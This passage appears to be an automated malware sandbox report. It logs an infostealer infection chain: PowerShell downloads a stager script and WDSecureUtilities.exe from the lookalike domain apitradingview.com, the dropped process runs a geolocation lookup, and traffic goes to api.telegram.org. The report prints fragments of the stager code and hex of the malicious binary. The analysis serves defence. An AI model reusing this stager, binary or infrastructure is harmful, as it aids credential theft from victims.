6        0x140032060  IsolateEnterStub__CEntryPointNativeFunctions__getIsolate__4JMPcmfHydBLuvj7ff2do8
7        0x140032090  IsolateEnterStub__CEntryPointNativeFunctions__tearDownIsolate__I3DVyDKs6z4vL79kJC9BEE
8        0x140051710  IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__CreateJavaVM__zfv8XhXAFhERNPUoh38uvF
9        0x140052530  IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__GetCreatedJavaVMs__jTTCq2UmbC48XDHPdLhle5
10       0x140030880  IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__GetDefaultJavaVMInitArgs__8P9gtUmW2O2BqcAmkyOH99
11       0x140053b30  IsolateEnterStub__JavaMainWrapper__run__cXbfAhOWcF90761nQYco7L
12       0x140051710  JNI_CreateJavaVM
13       0x140052530  JNI_GetCreatedJavaVMs
14       0x140030880  JNI_GetDefaultJavaVMInitArgs
15       0x140001000  __svm_code_section
16       0x1407209b8  __svm_version_info
17       0x140720928  __svm_vm_java_version
18       0x140720aa0  __svm_vm_target_ccompiler
19       0x140720ae8  __svm_vm_target_libc
20       0x140720988  __svm_vm_target_libraries
21       0x140720c20  __svm_vm_target_platform
22       0x140720d50  __svm_vm_target_staticlibraries
23       0x140031510  graal_attach_thread
24       0x1400316d0  graal_create_isolate
25       0x1400319d0  graal_detach_all_threads_and_tear_down_isolate
26       0x140031c20  graal_detach_thread
27       0x140031e90  graal_get_current_thread
28       0x140032060  graal_get_isolate
29       0x140032090  graal_tear_down_isolate
30       0x140053b30  main
Timestamp                        SID      Signature                                                               Severity  Source IP        Source Port  Dest IP          Dest Port  Protocol
2024-11-04T09:38:56.060215+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                       2         192.168.2.11     49733        86.104.15.60     443        TCP
2024-11-04T09:39:04.720276+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         172.202.163.200  443          192.168.2.11     49774      TCP
2024-11-04T09:39:43.048659+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         172.202.163.200  443          192.168.2.11     49981      TCP
                                                          Nov 4, 2024 09:39:06.370711088 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.370733976 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370786905 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370810032 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370887995 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370914936 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370923996 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370950937 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.370973110 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.371011972 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380251884 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.380348921 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380369902 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.380623102 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380637884 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.380696058 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380705118 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.380723000 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380728960 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.380742073 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380762100 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380902052 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380924940 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380969048 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.380987883 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.381009102 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.381095886 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.381150961 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385263920 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385432005 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385454893 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385459900 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385468960 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385540009 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385622025 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385632992 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385653973 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385659933 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385682106 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385687113 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385716915 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385745049 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385754108 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385773897 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385785103 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.385848045 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385920048 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.385945082 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.386017084 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.386024952 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:06.386046886 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.386064053 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.386076927 CET49795443192.168.2.11149.154.167.220
                                                          Nov 4, 2024 09:39:06.390645027 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:07.330739975 CET44349795149.154.167.220192.168.2.11
                                                          Nov 4, 2024 09:39:07.342972040 CET49795443192.168.2.11149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 4, 2024 09:38:51.096915960 CET | 49537 | 53 | 192.168.2.11 | 1.1.1.1
Nov 4, 2024 09:38:52.041392088 CET | 53 | 49537 | 1.1.1.1 | 192.168.2.11
Nov 4, 2024 09:38:58.630949974 CET | 54698 | 53 | 192.168.2.11 | 1.1.1.1
Nov 4, 2024 09:38:58.641133070 CET | 53 | 54698 | 1.1.1.1 | 192.168.2.11
Nov 4, 2024 09:39:05.259938955 CET | 61368 | 53 | 192.168.2.11 | 1.1.1.1
Nov 4, 2024 09:39:05.266911983 CET | 53 | 61368 | 1.1.1.1 | 192.168.2.11
Nov 4, 2024 09:39:17.769067049 CET | 57942 | 53 | 192.168.2.11 | 1.1.1.1
Nov 4, 2024 09:39:17.775837898 CET | 53 | 57942 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 4, 2024 09:38:51.096915960 CET | 192.168.2.11 | 1.1.1.1 | 0xcebe | Standard query (0) | apitradingview.com | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:38:58.630949974 CET | 192.168.2.11 | 1.1.1.1 | 0x425f | Standard query (0) | get.geojs.io | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:39:05.259938955 CET | 192.168.2.11 | 1.1.1.1 | 0x3c72 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:39:17.769067049 CET | 192.168.2.11 | 1.1.1.1 | 0x650c | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 4, 2024 09:38:52.041392088 CET | 1.1.1.1 | 192.168.2.11 | 0xcebe | No error (0) | apitradingview.com | | 86.104.15.60 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:38:58.641133070 CET | 1.1.1.1 | 192.168.2.11 | 0x425f | No error (0) | get.geojs.io | | 172.67.70.233 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:38:58.641133070 CET | 1.1.1.1 | 192.168.2.11 | 0x425f | No error (0) | get.geojs.io | | 104.26.1.100 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:38:58.641133070 CET | 1.1.1.1 | 192.168.2.11 | 0x425f | No error (0) | get.geojs.io | | 104.26.0.100 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:39:05.266911983 CET | 1.1.1.1 | 192.168.2.11 | 0x3c72 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:39:17.775837898 CET | 1.1.1.1 | 192.168.2.11 | 0x650c | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• apitradingview.com
• get.geojs.io
• api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49717 | 86.104.15.60 | 443 | 8016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-04 08:38:53 UTC | 105 | OUT | GET /ermando1.txt HTTP/1.1
User-Agent: TradingView
Host: apitradingview.com
Connection: Keep-Alive
2024-11-04 08:38:53 UTC | 435 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/octet-stream
last-modified: Sat, 26 Oct 2024 21:19:04 GMT
accept-ranges: bytes
content-length: 1933
date: Mon, 04 Nov 2024 08:38:53 GMT
server: LiteSpeed
content-disposition: attachment
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-04 08:38:53 UTC | 933 | IN | Data Raw: 24 69 73 41 64 6d 69 6e 20 3d 20 5b 62 6f 6f 6c 5d 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 50 72 69 6e 63 69 70 61 6c 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 49 64 65 6e 74 69 74 79 5d 3a 3a 47 65 74 43 75 72 72 65 6e 74 28 29 29 29 2e 49 73 49 6e 52 6f 6c 65 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 42 75 69 6c 74 49 6e 52 6f 6c 65 5d 3a 3a 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 29 0d 0a 0d 0a 69 66 20 28 2d 6e 6f 74 20 24 69 73 41 64 6d 69 6e 29 20 7b 0d 0a 20 20 20 20 57 72 69 74 65 2d 48 6f 73 74 20 22 45 72 72 6f 72 3a 20 43 6d 64 20 6d 75 73 74 20 62 65 20 72 75 6e 20 61 73 20 61 64 6d 69 6e
Data Ascii: $isAdmin = [bool](New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)if (-not $isAdmin) { Write-Host "Error: Cmd must be run as admin
2024-11-04 08:38:53 UTC | 1000 | IN | Data Raw: 69 73 74 20 27 2d 70 6b 65 6b 27 2c 20 27 2d 61 6f 61 27 2c 20 27 2d 79 27 20 2d 50 61 73 73 54 68 72 75 0d 0a 24 70 72 6f 63 65 73 73 2e 57 61 69 74 46 6f 72 45 78 69 74 28 29 0d 0a 0d 0a 24 64 65 6c 65 74 65 64 20 3d 20 24 66 61 6c 73 65 0d 0a 77 68 69 6c 65 20 28 2d 6e 6f 74 20 24 64 65 6c 65 74 65 64 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 54 65 73 74 2d 50 61 74 68 20 2d 50 61 74 68 20 24 65 78 65 50 61 74 68 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 23 20 d0 9f d1 80 d0 be d0 b2 d0 b5 d1 80 d0 ba d0 b0 2c 20 d1 87 d1 82 d0 be 20 d0 bf d1 80 d0 be d1 86 d0 b5 d1 81 d1 81 20 d0 b7 d0 b0 d0 b2 d0 b5 d1 80 d1 88 d1 91 d0 bd 0d 0a 20 20 20 20 20 20 20 20 24 72 75 6e 6e 69 6e 67 50 72 6f 63 65 73 73 65 73 20 3d 20 47 65 74 2d 50 72 6f 63 65 73 73 20 7c 20 57
Data Ascii: ist '-pkek', '-aoa', '-y' -PassThru$process.WaitForExit()$deleted = $falsewhile (-not $deleted) { if (Test-Path -Path $exePath) { # , $runningProcesses = Get-Process | W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49733 | 86.104.15.60 | 443 | 8016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-04 08:38:55 UTC | 160 | OUT | GET /WDSecureUtilities.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: apitradingview.com
2024-11-04 08:38:56 UTC | 404 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/x-msdownload
last-modified: Sat, 26 Oct 2024 18:55:44 GMT
accept-ranges: bytes
content-length: 252416
date: Mon, 04 Nov 2024 08:38:55 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-04 08:38:56 UTC | 964 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 45 28 1d 67 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 2e 02 00 00 aa 01 00 00 00 00 00 2e 4d 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 04 00 00 02 00 00 4a 7e 04 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELE(g"0..M `@ @J~`
2024-11-04 08:38:56 UTC | 14994 | IN | Data Raw: 04 7d 2d 00 00 0a 2a d2 20 1a 50 6c ea 20 29 55 55 a5 5a 28 20 00 00 0a 02 7b 2c 00 00 0a 6f 24 00 00 0a 58 20 29 55 55 a5 5a 28 22 00 00 0a 02 7b 2d 00 00 0a 6f 25 00 00 0a 58 2a 1e 02 7b 2e 00 00 0a 2a 1e 02 7b 2f 00 00 0a 2a 56 02 28 1f 00 00 0a 02 03 7d 2e 00 00 0a 02 04 7d 2f 00 00 0a 2a d2 20 4a 61 bb 65 20 29 55 55 a5 5a 28 20 00 00 0a 02 7b 2e 00 00 0a 6f 24 00 00 0a 58 20 29 55 55 a5 5a 28 22 00 00 0a 02 7b 2f 00 00 0a 6f 25 00 00 0a 58 2a 1e 02 7b 30 00 00 0a 2a 1e 02 7b 31 00 00 0a 2a 56 02 28 1f 00 00 0a 02 03 7d 30 00 00 0a 02 04 7d 31 00 00 0a 2a d2 20 3a 8c b6 6e 20 29 55 55 a5 5a 28 20 00 00 0a 02 7b 30 00 00 0a 6f 24 00 00 0a 58 20 29 55 55 a5 5a 28 22 00 00 0a 02 7b 31 00 00 0a 6f 25 00 00 0a 58 2a 1e 02 7b 32 00 00 0a 2a 1e 02 7b 33 00
Data Ascii: }-* Pl )UUZ( {,o$X )UUZ("{-o%X*{.*{/*V(}.}/* Jae )UUZ( {.o$X )UUZ("{/o%X*{0*{1*V(}0}1* :n )UUZ( {0o$X )UUZ("{1o%X*{2*{3
2024-11-04 08:38:56 UTC | 16384 | IN | Data Raw: 00 0a 74 27 00 00 1b 02 7b 56 00 00 04 7b 51 00 00 04 28 b7 01 00 06 0d 09 6f 59 00 00 0a 17 2f 02 14 2a 09 06 07 08 02 7b 56 00 00 04 7b 52 00 00 04 02 7b 56 00 00 04 7b 53 00 00 04 02 7b 55 00 00 04 28 37 01 00 06 2a 00 1b 30 06 00 18 03 00 00 24 00 00 11 73 3b 00 00 0a 0a 73 69 00 00 0a 25 1f 1a 28 3c 00 00 0a 6f 6a 00 00 0a 6f 93 00 00 0a 0b 38 d2 02 00 00 12 01 28 94 00 00 0a 7e 59 00 00 04 25 2d 17 26 7e 58 00 00 04 fe 06 a1 00 00 06 73 95 00 00 0a 25 80 59 00 00 04 28 3d 01 00 06 6f 93 00 00 0a 0c 38 80 02 00 00 12 02 28 94 00 00 0a 0d 02 14 09 28 9c 00 00 06 13 04 09 72 a6 4b 00 70 28 43 02 00 06 28 48 00 00 0a 13 05 02 11 05 28 9d 00 00 06 6f 93 00 00 0a 13 06 38 2c 02 00 00 12 06 28 94 00 00 0a 13 07 11 07 17 8d 5b 00 00 01 25 16 1f 5c 9d 6f 9c
Data Ascii: t'{V{Q(oY/*{V{R{V{S{U(7*0$s;si%(<ojo8(~Y%-&~Xs%Y(=o8((rKp(C(H(o8,([%\o
2024-11-04 08:38:56 UTC | 16384 | IN | Data Raw: 07 2a 11 09 2a 00 01 1c 00 00 00 00 a4 00 20 c4 00 03 99 00 00 01 02 00 2f 00 bf ee 00 08 00 00 00 00 1b 30 02 00 77 00 00 00 5b 00 00 11 14 0a 72 a0 7c 00 70 28 43 02 00 06 02 8c 60 00 00 01 28 da 00 00 0a 0b 72 2b 7d 00 70 28 43 02 00 06 07 73 e7 00 00 0a 6f e8 00 00 0a 6f e9 00 00 0a 0c 2b 2c 08 6f ea 00 00 0a 74 9a 00 00 01 72 4d 7d 00 70 28 43 02 00 06 6f eb 00 00 0a a5 9b 00 00 01 0d 09 28 6b 01 00 0a 0a de 03 26 de 00 08 6f ec 00 00 0a 2d cc de 0a 08 2c 06 08 6f 01 00 00 0a dc 06 2a 00 01 1c 00 00 00 00 55 00 09 5e 00 03 01 00 00 01 02 00 33 00 38 6b 00 0a 00 00 00 00 13 30 05 00 88 00 00 00 5c 00 00 11 28 6d 01 00 0a 25 8e 69 73 6e 01 00 0a 0a 20 04 01 00 00 73 6f 01 00 0a 0b 0c 16 0d 2b 31 08 09 9a 16 18 6f b9 00 00 0a 13 04 11 04 07 20 04 01 00
Data Ascii: ** /0w[r|p(C`(r+}p(Csoo+,otrM}p(Co(k&o-,o*U^38k0\(m%isn so+1o
2024-11-04 08:38:56 UTC | 16384 | IN | Data Raw: 00 00 28 6c 00 00 0a fe 0e 00 00 73 f4 00 00 0a fe 0e 01 00 20 00 00 00 00 fe 0e 02 00 2b 4c fe 0c 00 00 fe 0c 02 00 91 7e 78 01 00 04 fe 0c 02 00 7e 78 01 00 04 6f 59 00 00 0a 5d 6f 61 01 00 0a fe 0e 03 00 fe 0c 03 00 61 d1 fe 0e 04 00 fe 0c 01 00 fe 0c 04 00 6f 24 02 00 0a 26 fe 0c 02 00 20 01 00 00 00 58 fe 0e 02 00 fe 0c 02 00 fe 0c 00 00 8e 69 32 a8 fe 0c 01 00 6f 26 00 00 0a 2a 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 48 64 00 00 23 7e 00 00 b4 64 00 00 90 5d 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 44 c2 00 00 a0 88 00 00 23 55 53 00 e4 4a 01 00 10 00 00 00 23 47 55 49 44 00 00 00 f4 4a 01 00 0c 25 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 bf a2 3f 09 1e 00 00 00
Data Ascii: (ls +L~x~xoY]oaao$& Xi2o&*BSJBv4.0.30319lHd#~d]#StringsD#USJ#GUIDJ%#BlobW?
2024-11-04 08:38:56 UTC | 16384 | IN | Data Raw: 27 2f 00 00 06 00 0a 4d 02 00 01 00 00 33 00 00 02 00 6b 4e 00 00 01 00 0a 4d 00 00 02 00 80 18 00 00 01 00 14 33 00 00 02 00 8f 48 00 00 01 00 14 33 00 00 02 00 8f 48 00 00 03 00 27 2f 00 00 04 00 0a 4d 00 00 01 00 6b 4e 00 00 01 00 0a 4d 00 00 02 00 80 18 00 00 01 00 cb 4c 00 20 02 00 fa 5b 00 00 03 00 01 51 00 00 04 00 f8 50 00 00 05 00 54 4e 00 00 06 00 8f 48 00 00 01 00 cb 4c 00 20 02 00 fa 5b 00 00 03 00 01 51 00 00 04 00 f8 50 00 00 05 00 54 4e 00 00 06 00 8f 48 00 00 07 00 27 2f 00 00 08 00 0a 4d 00 00 01 00 54 4e 00 00 02 00 6b 4e 00 00 01 00 0a 4d 00 00 02 00 80 18 00 00 01 00 cb 4c 00 20 02 00 fa 5b 00 00 03 00 f0 50 00 00 04 00 e8 50 00 00 05 00 87 48 00 00 01 00 cb 4c 00 20 02 00 fa 5b 00 00 03 00 f0 50 00 00 04 00 e8 50 00 00 05 00 87 48 00
Data Ascii: '/M3kNM3H3H'/MkNML [QPTNHL [QPTNH'/MTNkNML [PPHL [PPH
2024-11-04 08:38:56 UTC | 16384 | IN | Data Raw: 6f 70 6f 76 65 6c 6f 6b 61 6c 75 66 65 00 46 72 6f 6d 49 6d 61 67 65 00 53 65 63 74 69 6f 6e 49 6d 61 67 65 00 49 6e 70 75 74 4c 61 6e 67 75 61 67 65 00 6c 61 6e 67 75 61 67 65 00 45 6d 61 67 69 67 65 00 41 64 64 52 61 6e 67 65 00 59 68 6f 68 61 68 75 6e 61 63 69 7a 6f 63 61 68 65 00 53 65 63 74 69 6f 6e 4e 6f 43 61 63 68 65 00 41 73 65 70 61 76 61 6a 75 74 6f 63 6f 74 79 68 65 00 63 6f 6f 6b 69 65 00 54 61 6b 65 00 59 6d 6f 6e 61 66 61 67 79 68 61 78 6f 62 6f 6b 65 00 45 6e 64 49 6e 76 6f 6b 65 00 42 65 67 69 6e 49 6e 76 6f 6b 65 00 59 7a 79 6d 79 6c 65 78 6f 63 75 62 75 6b 65 00 45 67 75 64 61 78 6f 62 75 66 75 6b 65 00 41 6d 79 72 6f 6e 61 6d 75 67 79 6b 65 00 49 73 43 6c 69 70 62 6f 61 72 64 46 6f 72 6d 61 74 41 76 61 69 6c 61 62 6c 65 00 49 45 6e 75
Data Ascii: opovelokalufeFromImageSectionImageInputLanguagelanguageEmagigeAddRangeYhohahunacizocaheSectionNoCacheAsepavajutocotyhecookieTakeYmonafagyhaxobokeEndInvokeBeginInvokeYzymylexocubukeEgudaxobufukeAmyronamugykeIsClipboardFormatAvailableIEnu
2024-11-04 08:38:56 UTC | 16384 | IN | Data Raw: 6a 61 6b 75 76 65 6b 79 67 65 6c 75 73 75 6d 79 00 41 6e 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 41 68 61 72 61 73 69 70 75 64 61 6e 75 6e 79 00 4f 78 69 72 61 74 69 78 61 76 75 6e 79 00 59 66 6f 76 75 70 69 6a 79 72 79 6e 79 00 4f 7a 69 78 65 72 75 72 65 70 79 00 41 78 65 63 79 6d 69 6e 79 6b 69 70 79 00 50 61 67 65 57 72 69 74 65 43 6f 70 79 00 42 6c 6f 63 6b 43 6f 70 79 00 46 69 6c 65 4d 61 70 43 6f 70 79 00 70 45 6e 74 72 6f 70 79 00 49 66 6f 64 69 6b 61 6b 69 66 79 70 79 00 4c 6f 61 64 4c 69 62 72 61 72 79 00 44 69 72 65 63 74 6f 72 79 00 64 69 72 65 63 74 6f 72 79 00 5a 69 70 46 69 6c 65 45 6e 74 72 79 00 52 65 67 69 73 74 72 79 00 4f 67 75 6c 61 74 65 66 75 78 75 6d 65 6c 6f 73 79 00 4f 73 79 73 75 67 61 67 79 6d 69 76 79 62 65 74 79 00 6f 70 5f 45
Data Ascii: jakuvekygelusumyAnySelectManyAharasipudanunyOxiratixavunyYfovupijyrynyOzixerurepyAxecyminykipyPageWriteCopyBlockCopyFileMapCopypEntropyIfodikakifypyLoadLibraryDirectorydirectoryZipFileEntryRegistryOgulatefuxumelosyOsysugagymivybetyop_E
2024-11-04 08:38:57 UTC | 16384 | IN | Data Raw: 00 41 00 6f 00 63 00 41 00 41 00 55 00 3d 00 00 19 4f 00 78 00 38 00 62 00 62 00 67 00 49 00 64 00 41 00 42 00 41 00 64 00 00 59 42 00 77 00 51 00 52 00 56 00 67 00 51 00 58 00 42 00 68 00 41 00 49 00 46 00 42 00 6f 00 41 00 42 00 68 00 38 00 42 00 42 00 51 00 34 00 4e 00 43 00 55 00 6b 00 48 00 48 00 51 00 34 00 59 00 42 00 52 00 6f 00 61 00 46 00 67 00 55 00 58 00 42 00 51 00 41 00 3d 00 00 29 4f 00 41 00 55 00 58 00 54 00 51 00 59 00 63 00 54 00 43 00 49 00 49 00 47 00 78 00 67 00 44 00 48 00 51 00 3d 00 3d 00 00 59 47 00 41 00 49 00 53 00 57 00 77 00 49 00 63 00 43 00 52 00 4d 00 41 00 47 00 52 00 4d 00 42 00 42 00 42 00 45 00 4d 00 43 00 51 00 4d 00 47 00 43 00 56 00 49 00 50 00 47 00 77 00 59 00 59 00 44 00 68 00 34 00 57 00 43 00 51 00 45 00 65 00
Data Ascii: AocAAU=Ox8bbgIdABAdYBwQRVgQXBhAIFBoABh8BBQ4NCUkHHQ4YBRoaFgUXBQA=)OAUXTQYcTCIIGxgDHQ==YGAISWwIcCRMAGRMBBBEMCQMGCVIPGwYYDh4WCQEe
2024-11-04 08:38:57 UTC | 16384 | IN | Data Raw: 79 00 4a 00 54 00 67 00 2f 00 52 00 51 00 3d 00 3d 00 00 29 4f 00 41 00 73 00 4c 00 58 00 41 00 30 00 46 00 50 00 41 00 63 00 47 00 46 00 42 00 45 00 56 00 47 00 6a 00 6b 00 44 00 00 49 4e 00 43 00 34 00 63 00 54 00 77 00 6f 00 53 00 43 00 53 00 6b 00 6c 00 46 00 68 00 6f 00 4c 00 43 00 42 00 34 00 31 00 43 00 77 00 77 00 44 00 43 00 31 00 77 00 41 00 42 00 51 00 4d 00 48 00 4e 00 51 00 3d 00 3d 00 00 29 4a 00 51 00 55 00 44 00 55 00 41 00 38 00 64 00 44 00 56 00 70 00 63 00 57 00 55 00 52 00 47 00 51 00 51 00 3d 00 3d 00 00 71 51 00 55 00 6f 00 34 00 53 00 52 00 4d 00 64 00 43 00 53 00 49 00 4d 00 46 00 54 00 38 00 50 00 48 00 56 00 39 00 53 00 58 00 56 00 39 00 45 00 53 00 67 00 39 00 44 00 57 00 53 00 63 00 39 00 50 00 54 00 6f 00 34 00 53 00 6b 00 6b
Data Ascii: yJTg/RQ==)OAsLXA0FPAcGFBEVGjkDINC4cTwoSCSklFhoLCB41CwwDC1wABQMHNQ==)JQUDUA8dDVpcWURGQQ==qQUo4SRMdCSIMFT8PHV9SXV9ESg9DWSc9PTo4Skk


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49754 | 172.67.70.233 | 443 | 3432 | C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-04 08:38:59 UTC | 76 | OUT | GET /v1/ip/geo.json HTTP/1.1
Host: get.geojs.io
Connection: Keep-Alive
2024-11-04 08:38:59 UTC | 1097 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 08:38:59 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
x-request-id: b4a5be1bbaa54448f22a783d52d4be24-ASH
strict-transport-security: max-age=15552000; includeSubDomains; preload
access-control-allow-origin: *
access-control-allow-methods: GET
pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
geojs-backend: ash-01
cf-cache-status: DYNAMIC
